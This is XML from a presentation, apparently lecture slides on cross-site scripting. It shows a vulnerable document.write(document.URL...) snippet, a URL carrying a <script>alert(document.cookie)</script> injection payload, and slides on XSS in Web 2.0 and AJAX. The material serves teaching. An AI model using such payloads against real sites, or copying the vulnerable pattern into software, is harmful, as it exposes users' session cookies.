              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.URL.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos,document.URL.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Works fine with this URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>welcome.html?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Joe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>What about this one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>welcome.html?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C09BB2-4252-CB4A-BB41-2AF39A9496E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8750489" y="2103120"/>
            <a:ext cx="2743200" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Attack code does not appear in HTML sent over network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C145F8-FDE7-E641-85F8-035BF5F239F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711143" y="3147073"/>
            <a:ext cx="2323072" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why is this important?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F752AD08-B90C-0144-A6B7-9865CBEFE7B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5907444" y="3956293"/>
            <a:ext cx="1865160" cy="1996560"/>
            <a:chOff x="5907444" y="3956293"/>
            <a:chExt cx="1865160" cy="199656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B9C62D9-2BF3-BD48-8C01-981F98A39608}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5907444" y="4009213"/>
                <a:ext cx="1865160" cy="1943640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9C62D9-2BF3-BD48-8C01-981F98A39608}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5889804" y="3991573"/>
                  <a:ext cx="1900800" cy="197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32FE0EA-E87D-AD43-BA30-A4F6EE1C14D8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5936244" y="3956293"/>
                <a:ext cx="270720" cy="54360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32FE0EA-E87D-AD43-BA30-A4F6EE1C14D8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5918244" y="3938653"/>
                  <a:ext cx="306360" cy="90000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393796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48">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4BDA93A-6027-2C4B-9D63-52AD21D689D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>XSS in Web 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556AD185-8A50-4943-89AE-93EBF80A674C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852226" y="4064000"/>
            <a:ext cx="9180773" cy="2151406"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Malicious scripts may be …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Contained in arguments of dynamically created JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Contained in JavaScript arrays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Dynamically written into the DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3074" name="Object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8748C74-F99D-8E4C-BF14-20C39FCEEC74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2159000" y="1790701"/>
          <a:ext cx="8001000" cy="2665413"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3448" name="Visio" r:id="rId3" imgW="3733800" imgH="1244600" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="3733800" imgH="1244600" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="3074" name="Object 5">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8748C74-F99D-8E4C-BF14-20C39FCEE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0" y="1790701"/>
                        <a:ext cx="8001000"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8" name="Object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E10A180-3648-364B-A7F4-6C0E0173C835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4216400" y="1943100"/>
          <a:ext cx="3886200" cy="382588"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3449" name="Visio" r:id="rId5" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId5" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="141318" name="Object 6">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E10A180-3648-364B-A7F4-6C0E0173C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400" y="1943100"/>
                        <a:ext cx="3886200"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9" name="Object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9FF46C-C564-664C-8E65-9916D45E22C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4216400" y="2324100"/>
          <a:ext cx="3810000" cy="376238"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3450" name="Visio" r:id="rId7" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId7" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="141319" name="Object 7">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9FF46C-C564-664C-8E65-9916D45E22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6400" y="2324100"/>
                        <a:ext cx="38100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20" name="Object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CDF86F-E93C-C54C-9424-130AF33C7477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4216400" y="2705100"/>
          <a:ext cx="3810000" cy="533400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3451" name="Visio" r:id="rId9" imgW="1854200" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId9" imgW="1854200" imgH="254000" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="141320" name="Object 8">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CDF86F-E93C-C54C-9424-130AF33C74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6400" y="2705100"/>
                        <a:ext cx="3810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21" name="Object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A32E7BB-DEC9-9444-99CF-3DC479F198CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4292600" y="3200400"/>
          <a:ext cx="3733800" cy="368300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3452" name="Visio" r:id="rId11" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId11" imgW="1689100" imgH="177800" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="141321" name="Object 9">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A32E7BB-DEC9-9444-99CF-3DC479F198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2600" y="3200400"/>
                        <a:ext cx="3733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FCE0FF49-7EB7-C14C-8593-FF33E06AEAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744500" y="6046129"/>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9124151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1318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="141318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1413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41319"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="141319"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1413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1320"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="141320"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14132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41321"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="141321"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14132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59FDD12B-8D3B-BE42-80B4-AC4E6EAFC22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS in AJAX (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Content Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C7A022-42DB-8547-813D-4257B9B6546F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10329082" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Downstream JavaScript arrays:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>downstreamArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = new Array(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
